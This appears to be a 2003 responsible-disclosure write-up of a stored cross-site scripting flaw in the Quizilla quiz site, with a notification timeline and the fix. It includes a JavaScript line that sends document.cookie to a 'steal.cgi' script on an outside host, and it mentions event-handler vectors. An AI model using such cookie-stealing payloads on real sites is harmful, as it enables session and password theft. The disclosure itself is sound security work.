Quizilla Javascript Vulnerability

Quizilla is an online site which allows people to create 'quizzes' for posting in online journals such as LiveJournal, and other blogs.

Quizzes usually take the form of a series of questions which may be answered via a HTML FORM, generating a result.

The intention is that you will complete the form, and recieve a result which contains HTML that you should post within your journal.

Amongst other things this result will contain a link to the quiz site, allowing your friends to take the same test. This is an interesting example of memes in action, seeing the same quiz appear in multiple online journals must be very interesting for their creators.

My Involvement

I've seen many quizes hosted upon this site in friends journals, and finally decided to create my own.

After signing up and logging in I was able to create an account 'skx', and my first quiz.

In the space of two hours I'd received 275 people filling it in.

The vulnerability

Each of the quizzes contains a series of questions which are entered by the creator of the quiz.

There is no validation, or filtering, of the questions which are entered - allowing for the execution of Javascript very simply.

For example the following question resulted in a dialog box appearing whenever the quiz was shown:


The cookie which was displayed looked like this:

  username=skx; password=not-my-password

As you can see the the username and password were both stored plain; not encrypted, hashed, or obfuscated.

Launching an automatic attack would be as simple as writing a simple CGI-script to email the results of this question:

   "http://www.steve.org.uk/cgi-bin/steal.cgi?" + document.cookie;

Fixing this problem

The suggested fix was to convert all the '<' characters in questions, titles, and results to '&lt;' and all the '>' characters to '&gt;'.

The webmaster of the site correctly pointed out that this would prevent all embedded HTML, such as bold and italic tags from working. His eventual solution fixed the problem directly.

Last Minute

After the initial notification I realised that it wasn't just the <script> tag which were problematic. The following code is also malicious:

<img src="http://www.steve.org.uk/images/Steve/2.jpg"


A small log of the communication involved:

  • Flaw spotted around 8PM.
    • Mail sent to 'webmaster', 'support', and 'security' at 21:15 11/03/2003
  • <script> flaw confirmed at 22:00 11/03/2003
  • I was notified that the <script> flaw was fixed at 19:40 12/03/2003
  • Verified that all forms of <script> attacks were fixed 20:00 12/03/2003
  • Notified the author that the site was still vulnerable via 'onMouseOver' etc 20:06 12/03/2003.
  • Verified at 20:13 12/03/2003

(All times GMT)

Thanks to M Nielsen for reacting so quickly, and for being ready to acknowledge the flaw.